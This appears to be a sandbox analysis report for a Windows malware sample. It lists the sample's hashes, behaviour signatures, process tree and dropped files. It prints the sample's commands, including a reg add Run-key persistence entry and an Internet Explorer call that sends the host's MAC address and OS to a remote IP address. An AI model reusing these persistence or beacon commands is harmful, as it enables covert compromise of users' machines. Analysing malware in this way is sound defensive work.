Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    153s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    01/12/2022, 13:51

General

  • Target

    ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe

  • Size

    365KB

  • MD5

    56d60722af183b394ddb2760e261909e

  • SHA1

    e87182c5b3a6b772a26d601aef6366182c560915

  • SHA256

    ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda

  • SHA512

    ed852a3cb6bb720882c4b34e5b2117e59c8c64c0e83ec0441cd90ce394061b90f8b35210d31abc72094c79a039bb97ff52f82cf9276e8ea5c766e91f9efb7862

  • SSDEEP

    6144:pTfFDbRnOTr085p8mkJeapssUZn7kyPTd4lnqukJja9zTK:v5Oc85prapshZn7/B5cG

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 59 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe
    "C:\Users\Admin\AppData\Local\Temp\ccf859d71b2177782404578f3d19dc75132c6c0534e2ec2cac9353e51752acda.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Program Files (x86)\winsoft9\t2.exe
      "C:\Program Files (x86)\winsoft9\t2.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:980
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "micrososot" /d "c:\program files (x86)\winsoft9\t2.exe " /f
        3⤵
        • Adds Run key to start application
        PID:2020
    • C:\Program Files (x86)\winsoft9\bho.exe
      "C:\Program Files (x86)\winsoft9\bho.exe"
      2⤵
      • Executes dropped EXE
      PID:1076
    • C:\Program Files (x86)\winsoft9\test.exe
      "C:\Program Files (x86)\winsoft9\test.exe"
      2⤵
      • Executes dropped EXE
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=da-7e-66-f9-f4-5d&os=Microsoft Windows XP&flag=dd36240e306c166dd7f0613efeb0c076&user=test
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1380 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1840
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1380 CREDAT:406530 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:964
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"
      2⤵
        PID:1776
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1184
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1184 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:272

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files (x86)\winsoft9\1.vbs

      Filesize

      154B

      MD5

      efafb2e23c3a56c7c0a585c8f3a74c15

      SHA1

      24e2f29d57199a01d8e521b2468cfb2e4d338b3a

      SHA256

      45a4effd474083ae4bf4b8cef347f78c9d243aee6a7a9dd01b2fc9a069f26678

      SHA512

      9bc509ead39fef370be722e2e90730ce089857107d4d1d273502f85da26e213031e8f3a1e14f7d174274bf936121ea067c438850d36c510ef0ab37f7b8cba2ee

    • C:\Program Files (x86)\winsoft9\bho.exe

      Filesize

      65KB

      MD5

      4ba9a7d68cf22eef4354e6695b14109c

      SHA1

      20b6adf9febd22fa74662bf8dfd5a4f5803eda38

      SHA256

      9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

      SHA512

      907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

    • C:\Program Files (x86)\winsoft9\t2.exe

      Filesize

      12.9MB

      MD5

      c59ad09f4eb12b46a7ba0a38227da51e

      SHA1

      06b7396f728ff236b8ef13d2416fef312e592939

      SHA256

      9b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316

      SHA512

      f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145

    • C:\Program Files (x86)\winsoft9\test.exe

      Filesize

      12.9MB

      MD5

      715c3c7d943e785d326bf4d8940bfd2a

      SHA1

      519ba001798b16ad089f409c738d869c91202d8c

      SHA256

      b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7

      SHA512

      0901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90

    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D5EE6F31-7348-11ED-B390-DA7E66F9F45D}.dat

      Filesize

      5KB

      MD5

      4532a909c358f27ec595f9aea09f77ae

      SHA1

      d81b4fe9651950227688121c9a60f1c3f7081acd

      SHA256

      9ff448d77fba4deaf72c8472426faba143ce542bceda8c4747837e38c24d01a4

      SHA512

      b2e0c6e5e4b4633521535038ee244d2e8f979ee0395a699d678a12dca9d174cbc425f104f7adccf50f4b0d3be3601f859b71218eb8b0a53909d37f62933fc512

    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D63F5DF0-7348-11ED-B390-DA7E66F9F45D}.dat

      Filesize

      4KB

      MD5

      a5569ca4afca676b859f250b1e747858

      SHA1

      b7f88a0577e405e0875ea80a0d719debbc5547d7

      SHA256

      ffd7b5d98a4c2c3da69261d48933bce5018d5678a762dc2d73f0f5a1b357af96

      SHA512

      e7a96ceedc4aa6c9ec590fbb89f8175143d90d78c76d1da051e421baf1d7892398de3084a3ac600a4c7910296c7e43d1dabfb6f7d2c25fe8c64824cd19e037f1

    • \??\c:\program files (x86)\winsoft9\t2.exe

      Filesize

      12.9MB

      MD5

      c59ad09f4eb12b46a7ba0a38227da51e

      SHA1

      06b7396f728ff236b8ef13d2416fef312e592939

      SHA256

      9b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316

      SHA512

      f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145

    • \Program Files (x86)\winsoft9\bho.exe

      Filesize

      65KB

      MD5

      4ba9a7d68cf22eef4354e6695b14109c

      SHA1

      20b6adf9febd22fa74662bf8dfd5a4f5803eda38

      SHA256

      9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

      SHA512

      907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

    • \Program Files (x86)\winsoft9\bho.exe

      Filesize

      65KB

      MD5

      4ba9a7d68cf22eef4354e6695b14109c

      SHA1

      20b6adf9febd22fa74662bf8dfd5a4f5803eda38

      SHA256

      9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

      SHA512

      907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

    • \Program Files (x86)\winsoft9\t2.exe

      Filesize

      12.9MB

      MD5

      c59ad09f4eb12b46a7ba0a38227da51e

      SHA1

      06b7396f728ff236b8ef13d2416fef312e592939

      SHA256

      9b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316

      SHA512

      f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145

    • \Program Files (x86)\winsoft9\t2.exe

      Filesize

      12.9MB

      MD5

      c59ad09f4eb12b46a7ba0a38227da51e

      SHA1

      06b7396f728ff236b8ef13d2416fef312e592939

      SHA256

      9b46fb443da0aab5aa10aa0e630b2a8b30cd7476f559c0ead337af9f25095316

      SHA512

      f6e3ad3230bd1beae8e30d17f1e7338a1a13cfb1c5eb3c79acdcaf1c1a3d20e7401f691e23df7e188b0ff6a0f81279bb5812893eab2493501cb232dee20ef145

    • \Program Files (x86)\winsoft9\test.exe

      Filesize

      12.9MB

      MD5

      715c3c7d943e785d326bf4d8940bfd2a

      SHA1

      519ba001798b16ad089f409c738d869c91202d8c

      SHA256

      b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7

      SHA512

      0901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90

    • \Program Files (x86)\winsoft9\test.exe

      Filesize

      12.9MB

      MD5

      715c3c7d943e785d326bf4d8940bfd2a

      SHA1

      519ba001798b16ad089f409c738d869c91202d8c

      SHA256

      b1d0c0813470896ca9d85c7e7604d10ae63c528f4d85f70a77e82233d659bfd7

      SHA512

      0901f98b09ed9136062c59fd5feed75b514dffa94bc272d1564ca574822e03b0fb9b7bab975858838443dfe3d243d4af92596789d0a2f0f52b52014207fddf90

    • memory/980-64-0x0000000000400000-0x0000000000421000-memory.dmp

      Filesize

      132KB

    • memory/980-84-0x0000000004C70000-0x0000000005CD2000-memory.dmp

      Filesize

      16.4MB

    • memory/980-79-0x0000000000400000-0x0000000000421000-memory.dmp

      Filesize

      132KB

    • memory/1632-76-0x0000000002F90000-0x0000000002FB4000-memory.dmp

      Filesize

      144KB

    • memory/1632-54-0x0000000075B41000-0x0000000075B43000-memory.dmp

      Filesize

      8KB

    • memory/1632-60-0x0000000002F90000-0x0000000002FB1000-memory.dmp

      Filesize

      132KB

    • memory/1632-59-0x0000000002F90000-0x0000000002FB1000-memory.dmp

      Filesize

      132KB

    • memory/1720-75-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB